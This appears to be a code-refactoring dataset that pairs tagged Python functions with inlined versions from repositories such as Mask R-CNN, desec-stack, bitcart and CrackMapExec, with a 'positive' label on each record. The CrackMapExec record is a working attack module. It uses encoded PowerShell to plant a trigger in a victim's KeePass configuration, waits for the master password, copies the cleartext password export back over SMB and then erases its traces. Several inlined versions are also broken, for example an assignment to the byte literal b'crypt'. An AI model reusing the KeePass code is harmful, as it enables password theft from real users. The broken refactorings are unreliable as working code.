self.apply(set_bn_eval)
[p2_out, p3_out, p4_out, p5_out, p6_out] = self.fpn(molded_images)
rpn_feature_maps = [p2_out, p3_out, p4_out, p5_out, p6_out]
mrcnn_feature_maps = [p2_out, p3_out, p4_out, p5_out]
layer_outputs = []
for p in rpn_feature_maps:
layer_outputs.append(self.rpn(p))
outputs = list(zip(*layer_outputs))
outputs = [torch.cat(list(o), dim=1) for o in outputs]
(rpn_class_logits, rpn_class, rpn_bbox) = outputs
proposal_count = self.config.POST_NMS_ROIS_TRAINING if 'inference' == 'training' else self.config.POST_NMS_ROIS_INFERENCE
rpn_rois = proposal_layer([rpn_class, rpn_bbox], proposal_count=proposal_count, nms_threshold=self.config.RPN_NMS_THRESHOLD, anchors=self.anchors, config=self.config)
if 'inference' == 'inference':
(mrcnn_class_logits, mrcnn_class, mrcnn_bbox) = self.classifier(mrcnn_feature_maps, rpn_rois)
detections = detection_layer(self.config, rpn_rois, mrcnn_class, mrcnn_bbox, image_metas)
(h, w) = self.config.IMAGE_SHAPE[:2]
scale = Variable(torch.from_numpy(np.array([h, w, h, w])).float(), requires_grad=False)
if self.config.GPU_COUNT:
scale = scale.cuda()
detection_boxes = detections[:, :4] / scale
detection_boxes = detection_boxes.unsqueeze(0)
mrcnn_mask = self.mask(mrcnn_feature_maps, detection_boxes)
detections = detections.unsqueeze(0)
mrcnn_mask = mrcnn_mask.unsqueeze(0)
(detections, mrcnn_mask) = [detections, mrcnn_mask]
elif 'inference' == 'training':
gt_class_ids = [molded_images, image_metas][2]
gt_boxes = [molded_images, image_metas][3]
gt_masks = [molded_images, image_metas][4]
(h, w) = self.config.IMAGE_SHAPE[:2]
scale = Variable(torch.from_numpy(np.array([h, w, h, w])).float(), requires_grad=False)
if self.config.GPU_COUNT:
scale = scale.cuda()
gt_boxes = gt_boxes / scale
(rois, target_class_ids, target_deltas, target_mask) = detection_target_layer(rpn_rois, gt_class_ids, gt_boxes, gt_masks, self.config)
if not rois.size():
mrcnn_class_logits = Variable(torch.FloatTensor())
mrcnn_class = Variable(torch.IntTensor())
mrcnn_bbox = Variable(torch.FloatTensor())
mrcnn_mask = Variable(torch.FloatTensor())
if self.config.GPU_COUNT:
mrcnn_class_logits = mrcnn_class_logits.cuda()
mrcnn_class = mrcnn_class.cuda()
mrcnn_bbox = mrcnn_bbox.cuda()
mrcnn_mask = mrcnn_mask.cuda()
else:
(mrcnn_class_logits, mrcnn_class, mrcnn_bbox) = self.classifier(mrcnn_feature_maps, rois)
mrcnn_mask = self.mask(mrcnn_feature_maps, rois)
(detections, mrcnn_mask) = [rpn_class_logits, rpn_bbox, target_class_ids, mrcnn_class_logits, target_deltas, mrcnn_bbox, target_mask, mrcnn_mask]
detections = detections.data.cpu().numpy()
mrcnn_mask = mrcnn_mask.permute(0, 1, 3, 4, 2).data.cpu().numpy()
results = []
for (i, image) in enumerate(images):
zero_ix = np.where(detections[i][:, 4] == 0)[0]
N = zero_ix[0] if zero_ix.shape[0] > 0 else detections[i].shape[0]
boxes = detections[i][:N, :4]
class_ids = detections[i][:N, 4].astype(np.int32)
scores = detections[i][:N, 5]
masks = mrcnn_mask[i][np.arange(N), :, :, class_ids]
h_scale = image.shape[0] / (windows[i][2] - windows[i][0])
w_scale = image.shape[1] / (windows[i][3] - windows[i][1])
scale = min(h_scale, w_scale)
shift = windows[i][:2]
scales = np.array([scale, scale, scale, scale])
shifts = np.array([shift[0], shift[1], shift[0], shift[1]])
boxes = np.multiply(boxes - shifts, scales).astype(np.int32)
exclude_ix = np.where((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
N = class_ids.shape[0]
full_masks = []
for i in range(N):
full_mask = utils.unmold_mask(masks[i], boxes[i], image.shape)
full_masks.append(full_mask)
full_masks = np.stack(full_masks, axis=-1) if full_masks else np.empty((0,) + masks.shape[1:3])
(final_rois, final_class_ids, final_scores, final_masks) = (boxes, class_ids, scores, full_masks)
results.append({'rois': final_rois, 'class_ids': final_class_ids, 'scores': final_scores, 'masks': final_masks})
return results
|
3D-SDN
|
positive
|
def on_admin_login(self, context, connection):
if self.action == 'ADD':
<DeepExtract>
if self.trigger_added(context, connection):
context.log.info('The specified configuration file already contains a trigger called "{}", skipping'.format(self.keepass_config_path, self.trigger_name))
return
context.log.info('Adding trigger "{}" to "{}"'.format(self.trigger_name, self.keepass_config_path))
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_ExportPath', self.export_path)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_ExportName', self.export_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_TriggerName', self.trigger_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_KeePassXMLPath', self.keepass_config_path)
if self.powershell_exec_method == 'ENCODE':
add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode('UTF-16LE')).decode('utf-8')
add_trigger_script_cmd = 'powershell.exe -e {}'.format(add_trigger_script_b64)
connection.execute(add_trigger_script_cmd)
sleep(2)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.add_trigger_script_str)
except Exception as e:
context.log.error('Error while adding malicious trigger to file: {}'.format(e))
sys.exit(1)
if self.trigger_added(context, connection):
context.log.success('Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files'.format(self.trigger_name, self.keepass_config_path))
else:
context.log.error('Unknown error when adding malicious trigger to file')
sys.exit(1)
</DeepExtract>
elif self.action == 'CHECK':
<DeepExtract>
if self.trigger_added(context, connection):
context.log.info('Malicious trigger "{}" found in "{}"'.format(self.trigger_name, self.keepass_config_path))
else:
context.log.info('No trigger "{}" found in "{}"'.format(self.trigger_name, self.keepass_config_path))
</DeepExtract>
elif self.action == 'RESTART':
<DeepExtract>
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
csv_reader = reader(search_keepass_process_output_csv.split('\n'), delimiter=',')
next(csv_reader)
keepass_process_list = list(csv_reader)
keepass_users = []
for process in keepass_process_list:
keepass_users.append(process[1])
if len(keepass_users) == 0:
context.log.error('No running KeePass process found, aborting restart')
return
elif len(keepass_users) == 1:
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split('\\')[1] != self.keepass_user):
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False
for user in keepass_users:
if user == self.keepass_user or user.split('\\')[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
context.log.error('Multiple KeePass processes were found, please specify parameter USER to target one')
return
context.log.info("Restarting {}'s KeePass process".format(keepass_users[0]))
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassUser', self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassBinaryPath', self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_DummyServiceName', self.dummy_service_name)
if self.powershell_exec_method == 'ENCODE':
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode('UTF-16LE')).decode('utf-8')
restart_keepass_script_cmd = 'powershell.exe -e {}'.format(restart_keepass_script_b64)
connection.execute(restart_keepass_script_cmd)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:
context.log.error('Error while restarting KeePass: {}'.format(e))
return
</DeepExtract>
elif self.action == 'POLL':
<DeepExtract>
found = False
context.log.info('Polling for database export every {} seconds, please be patient'.format(self.poll_frequency_seconds))
context.log.info('we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything')
if self.export_path == '%APPDATA%' or self.export_path == '%appdata%':
poll_export_command_str = 'powershell.exe "Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output (\'C:\\Users\\\'+$_.Name+\'\\AppData\\Roaming\\{}\')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}"'.format(self.export_name)
else:
export_full_path = "'{}\\{}'".format(self.export_path, self.export_name)
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
while not found:
poll_exports_command_output = connection.execute(poll_export_command_str, True)
if self.export_name not in poll_exports_command_output:
print('.', end='', flush=True)
sleep(self.poll_frequency_seconds)
continue
print('')
context.log.success('Found database export !')
for (count, export_path) in enumerate(poll_exports_command_output.split('\r\n')):
try:
buffer = BytesIO()
connection.conn.getFile(self.share, export_path.split(':')[1], buffer.write)
if count > 0:
local_full_path = self.local_export_path + '/' + self.export_name.split('.')[0] + '_' + str(count) + '.' + self.export_name.split('.')[1]
else:
local_full_path = self.local_export_path + '/' + self.export_name
with open(local_full_path, 'wb') as f:
f.write(buffer.getbuffer())
remove_export_command_str = 'powershell.exe Remove-Item {}'.format(export_path)
connection.execute(remove_export_command_str, True)
context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path))
found = True
except Exception as e:
context.log.error('Error while polling export files, exiting : {}'.format(e))
</DeepExtract>
elif self.action == 'CLEAN':
<DeepExtract>
if self.export_path == '%APPDATA%' or self.export_path == '%appdata%':
poll_export_command_str = 'powershell.exe "Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output (\'C:\\Users\\\'+$_.Name+\'\\AppData\\Roaming\\{}\')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}"'.format(self.export_name)
else:
export_full_path = "'{}\\{}'".format(self.export_path, self.export_name)
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
poll_export_command_output = connection.execute(poll_export_command_str, True)
if self.export_name in poll_export_command_output:
for export_path in poll_export_command_output.split('\r\n'):
context.log.info('Database export found in "{}", removing'.format(export_path))
remove_export_command_str = 'powershell.exe Remove-Item {}'.format(export_path)
connection.execute(remove_export_command_str, True)
else:
context.log.info('No export found in {} , everything is cleaned'.format(self.export_path))
if self.trigger_added(context, connection):
self.remove_trigger_script_str = self.remove_trigger_script_str.replace('REPLACE_ME_KeePassXMLPath', self.keepass_config_path)
self.remove_trigger_script_str = self.remove_trigger_script_str.replace('REPLACE_ME_TriggerName', self.trigger_name)
if self.powershell_exec_method == 'ENCODE':
remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode('UTF-16LE')).decode('utf-8')
remove_trigger_script_command_str = 'powershell.exe -e {}'.format(remove_trigger_script_b64)
connection.execute(remove_trigger_script_command_str, True)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.remove_trigger_script_str)
except Exception as e:
context.log.error('Error while deleting trigger, exiting: {}'.format(e))
sys.exit(1)
if self.trigger_added(context, connection):
context.log.error('Unknown error while removing trigger "{}", exiting'.format(self.trigger_name))
else:
context.log.info('Found trigger "{}" in configuration file, removing'.format(self.trigger_name))
else:
context.log.success('No trigger "{}" found in "{}", skipping'.format(self.trigger_name, self.keepass_config_path))
</DeepExtract>
<DeepExtract>
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
csv_reader = reader(search_keepass_process_output_csv.split('\n'), delimiter=',')
next(csv_reader)
keepass_process_list = list(csv_reader)
keepass_users = []
for process in keepass_process_list:
keepass_users.append(process[1])
if len(keepass_users) == 0:
context.log.error('No running KeePass process found, aborting restart')
return
elif len(keepass_users) == 1:
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split('\\')[1] != self.keepass_user):
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False
for user in keepass_users:
if user == self.keepass_user or user.split('\\')[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
context.log.error('Multiple KeePass processes were found, please specify parameter USER to target one')
return
context.log.info("Restarting {}'s KeePass process".format(keepass_users[0]))
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassUser', self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassBinaryPath', self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_DummyServiceName', self.dummy_service_name)
if self.powershell_exec_method == 'ENCODE':
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode('UTF-16LE')).decode('utf-8')
restart_keepass_script_cmd = 'powershell.exe -e {}'.format(restart_keepass_script_b64)
connection.execute(restart_keepass_script_cmd)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:
context.log.error('Error while restarting KeePass: {}'.format(e))
return
</DeepExtract>
elif self.action == 'ALL':
<DeepExtract>
context.log.highlight('')
self.add_trigger(context, connection)
context.log.highlight('')
self.restart(context, connection)
self.poll(context, connection)
context.log.highlight('')
context.log.info('Cleaning everything..')
self.clean(context, connection)
self.restart(context, connection)
context.log.highlight('')
context.log.info('Extracting password..')
self.extract_password(context)
</DeepExtract>
|
def on_admin_login(self, context, connection):
if self.action == 'ADD':
if self.trigger_added(context, connection):
context.log.info('The specified configuration file already contains a trigger called "{}", skipping'.format(self.keepass_config_path, self.trigger_name))
return
context.log.info('Adding trigger "{}" to "{}"'.format(self.trigger_name, self.keepass_config_path))
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_ExportPath', self.export_path)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_ExportName', self.export_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_TriggerName', self.trigger_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_KeePassXMLPath', self.keepass_config_path)
if self.powershell_exec_method == 'ENCODE':
add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode('UTF-16LE')).decode('utf-8')
add_trigger_script_cmd = 'powershell.exe -e {}'.format(add_trigger_script_b64)
connection.execute(add_trigger_script_cmd)
sleep(2)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.add_trigger_script_str)
except Exception as e:
context.log.error('Error while adding malicious trigger to file: {}'.format(e))
sys.exit(1)
if self.trigger_added(context, connection):
context.log.success('Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files'.format(self.trigger_name, self.keepass_config_path))
else:
context.log.error('Unknown error when adding malicious trigger to file')
sys.exit(1)
elif self.action == 'CHECK':
if self.trigger_added(context, connection):
context.log.info('Malicious trigger "{}" found in "{}"'.format(self.trigger_name, self.keepass_config_path))
else:
context.log.info('No trigger "{}" found in "{}"'.format(self.trigger_name, self.keepass_config_path))
elif self.action == 'RESTART':
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
csv_reader = reader(search_keepass_process_output_csv.split('\n'), delimiter=',')
next(csv_reader)
keepass_process_list = list(csv_reader)
keepass_users = []
for process in keepass_process_list:
keepass_users.append(process[1])
if len(keepass_users) == 0:
context.log.error('No running KeePass process found, aborting restart')
return
elif len(keepass_users) == 1:
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split('\\')[1] != self.keepass_user):
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False
for user in keepass_users:
if user == self.keepass_user or user.split('\\')[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
context.log.error('Multiple KeePass processes were found, please specify parameter USER to target one')
return
context.log.info("Restarting {}'s KeePass process".format(keepass_users[0]))
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassUser', self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassBinaryPath', self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_DummyServiceName', self.dummy_service_name)
if self.powershell_exec_method == 'ENCODE':
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode('UTF-16LE')).decode('utf-8')
restart_keepass_script_cmd = 'powershell.exe -e {}'.format(restart_keepass_script_b64)
connection.execute(restart_keepass_script_cmd)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:
context.log.error('Error while restarting KeePass: {}'.format(e))
return
elif self.action == 'POLL':
found = False
context.log.info('Polling for database export every {} seconds, please be patient'.format(self.poll_frequency_seconds))
context.log.info('we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything')
if self.export_path == '%APPDATA%' or self.export_path == '%appdata%':
poll_export_command_str = 'powershell.exe "Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output (\'C:\\Users\\\'+$_.Name+\'\\AppData\\Roaming\\{}\')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}"'.format(self.export_name)
else:
export_full_path = "'{}\\{}'".format(self.export_path, self.export_name)
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
while not found:
poll_exports_command_output = connection.execute(poll_export_command_str, True)
if self.export_name not in poll_exports_command_output:
print('.', end='', flush=True)
sleep(self.poll_frequency_seconds)
continue
print('')
context.log.success('Found database export !')
for (count, export_path) in enumerate(poll_exports_command_output.split('\r\n')):
try:
buffer = BytesIO()
connection.conn.getFile(self.share, export_path.split(':')[1], buffer.write)
if count > 0:
local_full_path = self.local_export_path + '/' + self.export_name.split('.')[0] + '_' + str(count) + '.' + self.export_name.split('.')[1]
else:
local_full_path = self.local_export_path + '/' + self.export_name
with open(local_full_path, 'wb') as f:
f.write(buffer.getbuffer())
remove_export_command_str = 'powershell.exe Remove-Item {}'.format(export_path)
connection.execute(remove_export_command_str, True)
context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path))
found = True
except Exception as e:
context.log.error('Error while polling export files, exiting : {}'.format(e))
elif self.action == 'CLEAN':
if self.export_path == '%APPDATA%' or self.export_path == '%appdata%':
poll_export_command_str = 'powershell.exe "Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output (\'C:\\Users\\\'+$_.Name+\'\\AppData\\Roaming\\{}\')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}"'.format(self.export_name)
else:
export_full_path = "'{}\\{}'".format(self.export_path, self.export_name)
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
poll_export_command_output = connection.execute(poll_export_command_str, True)
if self.export_name in poll_export_command_output:
for export_path in poll_export_command_output.split('\r\n'):
context.log.info('Database export found in "{}", removing'.format(export_path))
remove_export_command_str = 'powershell.exe Remove-Item {}'.format(export_path)
connection.execute(remove_export_command_str, True)
else:
context.log.info('No export found in {} , everything is cleaned'.format(self.export_path))
if self.trigger_added(context, connection):
self.remove_trigger_script_str = self.remove_trigger_script_str.replace('REPLACE_ME_KeePassXMLPath', self.keepass_config_path)
self.remove_trigger_script_str = self.remove_trigger_script_str.replace('REPLACE_ME_TriggerName', self.trigger_name)
if self.powershell_exec_method == 'ENCODE':
remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode('UTF-16LE')).decode('utf-8')
remove_trigger_script_command_str = 'powershell.exe -e {}'.format(remove_trigger_script_b64)
connection.execute(remove_trigger_script_command_str, True)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.remove_trigger_script_str)
except Exception as e:
context.log.error('Error while deleting trigger, exiting: {}'.format(e))
sys.exit(1)
if self.trigger_added(context, connection):
context.log.error('Unknown error while removing trigger "{}", exiting'.format(self.trigger_name))
else:
context.log.info('Found trigger "{}" in configuration file, removing'.format(self.trigger_name))
else:
context.log.success('No trigger "{}" found in "{}", skipping'.format(self.trigger_name, self.keepass_config_path))
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
csv_reader = reader(search_keepass_process_output_csv.split('\n'), delimiter=',')
next(csv_reader)
keepass_process_list = list(csv_reader)
keepass_users = []
for process in keepass_process_list:
keepass_users.append(process[1])
if len(keepass_users) == 0:
context.log.error('No running KeePass process found, aborting restart')
return
elif len(keepass_users) == 1:
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split('\\')[1] != self.keepass_user):
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False
for user in keepass_users:
if user == self.keepass_user or user.split('\\')[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
context.log.error('Multiple KeePass processes were found, please specify parameter USER to target one')
return
context.log.info("Restarting {}'s KeePass process".format(keepass_users[0]))
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassUser', self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassBinaryPath', self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_DummyServiceName', self.dummy_service_name)
if self.powershell_exec_method == 'ENCODE':
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode('UTF-16LE')).decode('utf-8')
restart_keepass_script_cmd = 'powershell.exe -e {}'.format(restart_keepass_script_b64)
connection.execute(restart_keepass_script_cmd)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:
context.log.error('Error while restarting KeePass: {}'.format(e))
return
elif self.action == 'ALL':
context.log.highlight('')
self.add_trigger(context, connection)
context.log.highlight('')
self.restart(context, connection)
self.poll(context, connection)
context.log.highlight('')
context.log.info('Cleaning everything..')
self.clean(context, connection)
self.restart(context, connection)
context.log.highlight('')
context.log.info('Extracting password..')
self.extract_password(context)
</DeepExtract>
|
CrackMapExec
|
positive
|
def decrypt(token, *, context, ttl=None):
<DeepExtract>
b'crypt' = force_bytes(b'crypt', strings_only=True)
context = force_bytes(context, strings_only=True)
key = _derive_urlsafe_key(label=b'crypt', context=context)
</DeepExtract>
f = Fernet(key=key)
try:
ret = (f.extract_timestamp(token), f.decrypt(token, ttl=ttl))
metrics.get('desecapi_key_decryption_success').labels(context).inc()
return ret
except InvalidToken:
raise ValueError
|
def decrypt(token, *, context, ttl=None):
b'crypt' = force_bytes(b'crypt', strings_only=True)
context = force_bytes(context, strings_only=True)
key = _derive_urlsafe_key(label=b'crypt', context=context)
f = Fernet(key=key)
try:
ret = (f.extract_timestamp(token), f.decrypt(token, ttl=ttl))
metrics.get('desecapi_key_decryption_success').labels(context).inc()
return ret
except InvalidToken:
raise ValueError
|
desec-stack
|
positive
|
def add_comment_text(self, text):
"""Add or extend the node's comment.
If the node doesn't have a C property, adds one with the specified
text.
Otherwise, adds the specified text to the existing C property value
(with two newlines in front).
"""
if self.has_property(b'C'):
<DeepExtract>
self._set_raw_list(b'C', self._presenter.serialise(b'C', self.get(b'C') + b'\n\n' + text))
</DeepExtract>
else:
<DeepExtract>
self._set_raw_list(b'C', self._presenter.serialise(b'C', text))
</DeepExtract>
|
def add_comment_text(self, text):
"""Add or extend the node's comment.
If the node doesn't have a C property, adds one with the specified
text.
Otherwise, adds the specified text to the existing C property value
(with two newlines in front).
"""
if self.has_property(b'C'):
self._set_raw_list(b'C', self._presenter.serialise(b'C', self.get(b'C') + b'\n\n' + text))
else:
self._set_raw_list(b'C', self._presenter.serialise(b'C', text))
</DeepExtract>
|
betago
|
positive
|
def get_subdirs_number(path):
"""
Checks the number of subdirectories, and returns it. Useful for automatic
output folders generation.
"""
if not os.path.exists(path):
return 0
<DeepExtract>
subdirectories = [name for name in os.listdir(path) if os.path.isdir(os.path.join(path, name))]
</DeepExtract>
return len(subdirectories)
|
def get_subdirs_number(path):
"""
Checks the number of subdirectories, and returns it. Useful for automatic
output folders generation.
"""
if not os.path.exists(path):
return 0
subdirectories = [name for name in os.listdir(path) if os.path.isdir(os.path.join(path, name))]
return len(subdirectories)
|
Copycat-abstractive-opinion-summarizer
|
positive
|
def expected_resp(self, state):
data = super().expected_resp(state)
<DeepExtract>
data['wallets'] = [state['wallet']['id']]
data['notifications'] = [state['notification']['id']]
</DeepExtract>
data['user_id'] = state['user']['id']
return data
|
def expected_resp(self, state):
data = super().expected_resp(state)
data['wallets'] = [state['wallet']['id']]
data['notifications'] = [state['notification']['id']]
data['user_id'] = state['user']['id']
return data
|
bitcart
|
positive
|
def _add_rule_node_dependencies(rule_node):
if sequence_graph.has_node(rule_node):
return
sequence_graph.add_node(rule_node)
for out_edge in reverse_graph.out_edges_iter([rule_node]):
out_rule_node = out_edge[1]
if not sequence_graph.has_node(out_rule_node):
<DeepExtract>
if sequence_graph.has_node(out_rule_node):
return
sequence_graph.add_node(out_rule_node)
for out_edge in reverse_graph.out_edges_iter([out_rule_node]):
out_rule_node = out_edge[1]
if not sequence_graph.has_node(out_rule_node):
_add_rule_node_dependencies(out_rule_node)
sequence_graph.add_edge(out_rule_node, out_rule_node)
</DeepExtract>
sequence_graph.add_edge(rule_node, out_rule_node)
|
def _add_rule_node_dependencies(rule_node):
if sequence_graph.has_node(rule_node):
return
sequence_graph.add_node(rule_node)
for out_edge in reverse_graph.out_edges_iter([rule_node]):
out_rule_node = out_edge[1]
if not sequence_graph.has_node(out_rule_node):
if sequence_graph.has_node(out_rule_node):
return
sequence_graph.add_node(out_rule_node)
for out_edge in reverse_graph.out_edges_iter([out_rule_node]):
out_rule_node = out_edge[1]
if not sequence_graph.has_node(out_rule_node):
_add_rule_node_dependencies(out_rule_node)
sequence_graph.add_edge(out_rule_node, out_rule_node)
sequence_graph.add_edge(rule_node, out_rule_node)
|
anvil-build
|
positive
|
def add_ordering(self, *ordering, **kwargs):
for field_name in ordering:
if isinstance(field_name, six.string_types) and field_name != '?':
if field_name.startswith('-'):
field_name = field_name[1:]
<DeepExtract>
property_ref = resolve_queryable_property(self.model, QueryPath(field_name))[0]
if not property_ref:
return None
if full_group_by is None:
full_group_by = bool(ANNOTATION_TO_AGGREGATE_ATTRIBUTES_MAP) and (not self.select)
with self._add_queryable_property_annotation(property_ref, full_group_by) as annotation:
return annotation
</DeepExtract>
return super(QueryablePropertiesQueryMixin, self).add_ordering(*ordering, **kwargs)
|
def add_ordering(self, *ordering, **kwargs):
for field_name in ordering:
if isinstance(field_name, six.string_types) and field_name != '?':
if field_name.startswith('-'):
field_name = field_name[1:]
property_ref = resolve_queryable_property(self.model, QueryPath(field_name))[0]
if not property_ref:
return None
if full_group_by is None:
full_group_by = bool(ANNOTATION_TO_AGGREGATE_ATTRIBUTES_MAP) and (not self.select)
with self._add_queryable_property_annotation(property_ref, full_group_by) as annotation:
return annotation
return super(QueryablePropertiesQueryMixin, self).add_ordering(*ordering, **kwargs)
|
django-queryable-properties
|
positive
|
def get_IPv4s(self):
"""
Return all known IPv4 addresses of this container. It may be possible
that the container has disabled networking: in that case, the list is
empty
:return: list of str
"""
<DeepExtract>
inspect_data = self.inspect(refresh=True)
inspect_to_container_metadata(self.metadata, inspect_data, self.image)
return self.metadata
</DeepExtract>
return self.metadata.ipv4_addresses
|
def get_IPv4s(self):
"""
Return all known IPv4 addresses of this container. It may be possible
that the container has disabled networking: in that case, the list is
empty
:return: list of str
"""
inspect_data = self.inspect(refresh=True)
inspect_to_container_metadata(self.metadata, inspect_data, self.image)
return self.metadata
return self.metadata.ipv4_addresses
|
conu
|
positive
|
def _process_work_order_sync(self, process_wo_id):
"""
Process the work-order of the specified work-order id
and return the response. Used for synchronous execution.
Parameters:
@param process_wo_id - Id of the work-order that is to be processed
"""
logger.info('About to process work orders found in wo-worker-scheduled table.')
wo_id = self._kv_helper.csv_match_pop('wo-worker-scheduled', self._worker_id, process_wo_id)
if process_wo_id == wo_id:
<DeepExtract>
try:
wo_json_req = self._kv_helper.get('wo-requests', wo_id)
if wo_json_req is None:
logger.error('Received empty work order corresponding ' + 'to id %s from wo-requests table', wo_id)
wo_process_result = None
except Exception as e:
